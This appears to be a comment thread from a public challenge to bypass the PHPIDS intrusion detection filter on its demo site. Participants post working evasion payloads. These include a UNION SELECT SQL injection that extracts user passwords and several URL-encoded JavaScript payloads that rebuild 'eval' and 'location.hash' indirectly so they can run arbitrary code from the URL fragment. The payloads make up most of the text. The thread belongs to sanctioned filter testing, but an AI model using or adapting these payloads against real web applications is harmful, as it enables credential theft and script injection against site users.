I just want to add that this injection still works:
http://demo.php-ids.org/?test=1%20union%20all%20select%20password%20from%20users
--> ?test=1 union all select password from users
(query: SELECT name FROM users WHERE id = $test)

I think queries are more complicated (more columns selected, quotes used) in practice and more complicated injections will get detected by php-ids but maybe you find a good way to block this without triggering false positives ;))

@Reiners: The problem with your SQL injection is that there are no special chars included - the PHPIDS doesn't monitor strings without special chars due to performance issues. I agree that an SQL injection like this might work under certain circumstances but it would be pretty unusual.

here's a new one. i wanted to find a way to get the "eval" string using regular expressions... the "exec" function did the trick.
http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F%63%61%74%7E%69%6F%6E%2E%68%7E%61%73%68%2E%73%75%7E%62%73%74%72%69%6E%67%28%31%29%2F%3B%65%3D%2F%2E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%2E%2F%3B%66%3D%65%2E%65%78%65%63%28%64%29%3B%67%3D%66%5B%32%5D%3B%68%3D%66%5B%33%5D%3B%69%3D%66%5B%34%5D%3B%6A%3D%66%5B%35%5D%3B%6B%3D%67%2B%68%2B%69%2B%6A%3B%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%6B%29%29%3B#alert%280%29

gareth: I was just thinking the same thing... here's the injection: http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%65%3D%78%5B%35%5D%3B%76%3D%78%5B%32%32%5D%3B%61%3D%78%5B%31%5D%3B%6C%3D%78%5B%31%32%5D%3B%6F%3D%78%5B%31%35%5D%3B%63%3D%78%5B%33%5D%3B%74%3D%78%5B%32%30%5D%3B%69%3D%78%5B%39%5D%3B%6E%3D%78%5B%31%34%5D%3B%68%3D%78%5B%38%5D%3B%73%3D%78%5B%31%39%5D%3B%75%3D%78%5B%32%31%5D%3B%62%3D%78%5B%32%5D%3B%72%3D%78%5B%31%38%5D%3B%67%3D%78%5B%37%5D%3B%64%6F%74%3D%78%5B%32%37%5D%3B%75%6E%6F%3D%78%5B%32%39%5D%3B%6F%70%3D%78%5B%32%38%5D%3B%63%70%3D%78%5B%33%30%5D%3B%7A%3D%65%2B%76%2B%61%2B%6C%3B%79%3D%6C%2B%6F%2B%63%2B%61%2B%74%2B%69%2B%6F%2B%6E%2B%64%6F%74%2B%68%2B%61%2B%73%2B%68%2B%64%6F%74%2B%73%2B%75%2B%62%2B%73%2B%74%2B%72%2B%69%2B%6E%2B%67%2B%6F%70%2B%75%6E%6F%2B%63%70%3B%30%5B%27%27%2B%5B%7A%5D%5D%28%30%5B%27%27%2B%28%7A%29%5D%28%79%29%29%3B#alert%280%29

I do love the ''+/awef/ trick... brilliant. and the fact that strings are implicit arrays helps a lot too.

you can link to my site at http://p42.us .
yes, it is getting harder... but still doable: http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%2F%78%2F%3A%27%65%76%61%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%27%3B%61%3D%61%2B%62%3B%65%3D%31%21%3D%31%3F%2F%78%2F%3A%27%68%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%6F%63%61%74%69%6F%27%3B%63%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6E%27%3B%64%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%68%61%73%27%3B%68%3D%31%21%3D%31%3F%2F%78%2F%3A%27%31%29%27%3B%67%3D%31%21%3D%31%3F%2F%78%2F%3A%27%72%69%6E%67%28%30%27%3B%66%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%73%75%62%73%74%27%3B%62%3D%62%2B%63%2B%64%2B%65%2B%66%2B%67%2B%68%3B%42%3D%30%30%5B%27%27%2B%5B%61%5D%5D%28%62%29%3B%30%30%5B%27%27%2B%5B%61%5D%5D%28%42%29%3B#alert%28/blue_canary_in_the_outlet_by_the_light_switch__who_watches_over_you/%29 . :)